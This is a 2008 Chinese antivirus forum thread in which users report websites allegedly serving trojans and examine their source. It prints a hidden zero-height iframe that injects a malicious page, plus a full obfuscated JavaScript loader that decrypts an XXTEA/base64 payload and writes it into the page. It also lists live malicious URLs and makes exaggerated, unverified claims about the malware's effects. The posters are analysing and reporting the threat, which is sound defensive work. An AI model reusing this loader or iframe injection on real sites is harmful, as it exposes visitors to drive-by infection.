瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 发布挂了史上最强的病毒网站。
反病毒专家001 - 2008-10-8 6:20:00
http://88.women918.com/b1.htm?09?667
此站有大量木马经本人测试发现,次站上的木马决非一般360所能查杀的木马。直接K瑞星,360,K360
保险箱,K金山,
直接卸载,卡巴死机,杀毒之后,开机,CDEF,盘全部自动格式化,希望有关专业技术人员赶紧去查
一下这是什么鸟鸡吧毛病毒啊。
比皇虫军团还牛B的病毒。绝对是前无古人,后无来者。见一次死而无汗。


我真的不是开玩笑的哦。
http://www.dxp002.cn/llsg/23.htm
http://www.wrmfwe.cn/jzll/8.htm
http://www.zdq001.cn/yhyw/23.htm

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 360SE)
byxxdrls - 2008-10-8 8:44:00
打开网页,什么也没有--内容没有,病毒也没有。
yrt999 - 2008-10-8 8:53:00
在IE缓存发现两个JS,其他的没有异常,估计这两个JS 不是好东西!
激流涌进 - 2008-10-8 8:57:00
帮你提交一下到瑞星恶意网址上报了!下次可以自己上报,地址:
http://tool.ikaka.com/report.asp:default7:
狮子小卡 - 2008-10-8 20:10:00
我的瑞星给拦截了,上报之后,相信很快就会解决的:default5:
宝剑开锋 - 2008-10-8 21:53:00
“杀毒之后,开机,CDEF,盘全部自动格式化” 这个也太厉害吧。
sioter58 - 2008-10-9 10:26:00
这病毒也太恐怖了,赶紧上报
xc11 - 2008-10-9 11:08:00
这病毒也太恐怖了,赶紧上报,另上网小心点:default7: :default7:
卫星导航 - 2008-10-9 11:18:00
网站下载分析:
地址:http://www.dxp002.cn/llsg/23.htm
内容代码:
<br>
<br>
<Iframe src="http://zlwrnm1.cn/a220/fxx.htm" width=100 height=0></Iframe>
<br>
<br>
<br>
<br>


<Script language="javascript" type="text/javascript" src="http://js.users.51.la/1936348.js"></Script>

里面有两个地址(都为病毒地址不要点击)
http://js.users.51.la/1936348.js
http://zlwrnm1.cn/a220/fxx.htm
卫星导航 - 2008-10-9 11:21:00
网站:http://js.users.51.la/1936348.js
代码如下:
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a6348tf="51la";var a6348pu="";var a6348pf="51la";var a6348su=window.location;var a6348sf=document.referrer;var a6348of="";var a6348op="";var a6348ops=1;var a6348ot=1;var a6348d=new Date();var a6348color="";if (navigator.appName=="Netscape"){a6348color=screen.pixelDepth;} else {a6348color=screen.colorDepth;}<\/script><script>a6348tf=top.document.referrer;<\/script><script>a6348pu =window.parent.location;<\/script><script>a6348pf=window.parent.document.referrer;<\/script><script>a6348ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a6348ops=(a6348ops==null)?1: (parseInt(unescape((a6348ops)[2]))+1);var a6348oe =new Date();a6348oe.setTime(a6348oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a6348ops+ ";path=/;expires="+a6348oe.toGMTString();a6348ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a6348ot==null){a6348ot=1;}else{a6348ot=parseInt(unescape((a6348ot)[2])); a6348ot=(a6348ops==1)?(a6348ot+1):(a6348ot);}a6348oe.setTime(a6348oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a6348ot+";path=/;expires="+a6348oe.toGMTString();<\/script><script>a6348of=a6348sf;if(a6348pf!=="51la"){a6348of=a6348pf;}if(a6348tf!=="51la"){a6348of=a6348tf;}a6348op=a6348pu;try{lainframe}catch(e){a6348op=a6348su;}document.write(\'<img style="width:0px;height:0px" src="http://vip2.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=6&id=1936348&tpages=\'+a6348ops+\'&ttimes=\'+a6348ot+\'&tzone=\'+(0-a6348d.getTimezoneOffset()/60)+\'&tcolor=\'+a6348color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a6348of)+\'&vpage=\'+escape(a6348op)+\'" \/>\');<\/script>');
卫星导航 - 2008-10-9 11:23:00
网站:http://zlwrnm1.cn/a220/fxx.htm
源代码:
<script language =javascript>
function utf8to16(str){
var char3,out,i,len,char2,c;
out=[];i=0;
len=str["\x6c\x65\x6e\x67\x74\x68"];
    while(i<len){
        c=str.charCodeAt(i++);
        switch(c>>4)
        {
            case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);
            break;
            case 12:case 13:char2=str.charCodeAt(i++);
            var xxx="SB";
            out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));
            break;
            case 14:char2=str.charCodeAt(i++);
            char3=str.charCodeAt(i++);
            out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));
            break;
           
        }
    }
    return out.join('');
   
}
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
function base64decode(str)
{
    var c1,c2,c3,c4;
    var i,len,out;
    var xxxkavxd="SB";
    len=str.length;
    i=0;
    out="";
    while(i<len)
    {
        do
        {
            c1=base64DecodeChars[str.charCodeAt(i++)&0xff]
        }while(i<len&&c1==-1);
        if(c1==-1)
        break;
        do
        {
            c2=base64DecodeChars[str.charCodeAt(i++)&0xff]
        }while(i<len&&c2==-1);
        if(c2==-1)
        break;
        out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));
        do
        {
            c3=str.charCodeAt(i++)&0xff;
            if(c3==61)
            return out;
            c3=base64DecodeChars[c3]
        }while(i<len&&c3==-1);
        if(c3==-1)
        break;
        out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));
        do
        {
            c4=str.charCodeAt(i++)&0xff;
            if(c4==61)
            return out;
            c4=base64DecodeChars[c4]
        }while(i<len&&c4==-1);
        if(c4==-1)
        break;
        out+=String.fromCharCode(((c3&0x03)<<6)|c4)
    }
    return out
}
function long2str(v,w){
    var vl=v.length;
    var sl=v[vl-1]&0xffffffff;
    for(var i=0;i<vl;i++)
    {v=String.fromCharCode(v&0xff,v>>>8&0xff,v>>>16&0xff,v>>>24&0xff);
       
    }
    if(w){
        return v.join('').substring(0,sl);
       
    }
    else {
        return v.join('');
       
    }
}
function str2long(s,w){
    var len=s.length;
    var v=[];
    for(var i=0;i<len;i+=4)
    {
        v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;
       
    }
    if(w){
        v[v.length]=len;
       
    }
    return v;
   
}
function xxtea_decrypt(str,key){
    if(str==""){
        return "";
       
    }
    var v=str2long(str,false);
    var k=str2long(key,false);
    var n=v.length-1;
    var z=v[n-1],y=v[0],delta=0x9E3779B9;
    var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;
    while(sum!=0){
        e=sum>>>2&3;
        for(var p=n;p>0;p--){
            z=v[p-1];
            mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);
            y=v[p]=v[p]-mx&0xffffffff;
           
        }
        z=v[n];
        mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);
        y=v[0]=v[0]-mx&0xffffffff;
        sum=sum-delta&0xffffffff;
       
    }
    return long2str(v,true);
   
}
t="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"+"/tYE8"+"xLoD"+"fU"+"iB"+"Lj"+"nr"+"G5"+"Zx"+"Zh"+"vq"+"Lp"+"i4"+"xufMMDpGaB230cM9BXB/fj6/HJr5aAyB5HA21Lg2PJkrvjUs=";var xxxnod="sb";
t=utf8to16(xxtea_decrypt(base64decode(t),'dadong1'));document.write(t);document.write("");var jQwKgA1="\x66\x64\x73\x61\x63\x76\x73";
</script>
卫星导航 - 2008-10-9 11:27:00
如果有兴趣的话可以分析下啊!
baohe - 2008-10-9 12:04:00


引用:
原帖由 反病毒专家001 于 2008-10-8 6:20:00 发表
http://88.women918.com/b1.htm?09?667
此站有大量木马经本人测试发现,次站上的木马决非一般360所能查杀的木马。直接K瑞星,360,K360
保险箱,K金山,
直接卸载,卡巴死机,杀毒之后,开机,CDEF,盘全部自动格式化,希望有关专业技术人员赶紧去查
一下这是什么鸟鸡吧毛病毒啊。
比皇虫军团还牛B的病毒。绝对是前无古人,后无来者。见一次死而无汗。



应该是你自己的系统或浏览器有漏洞吧。

用opera浏览器去溜达了一趟,除了看到个白板页面,没其它任何问题。
1
查看完整版本: 发布挂了史上最强的病毒网站。
© 2000 - 2026 Rising Corp. Ltd.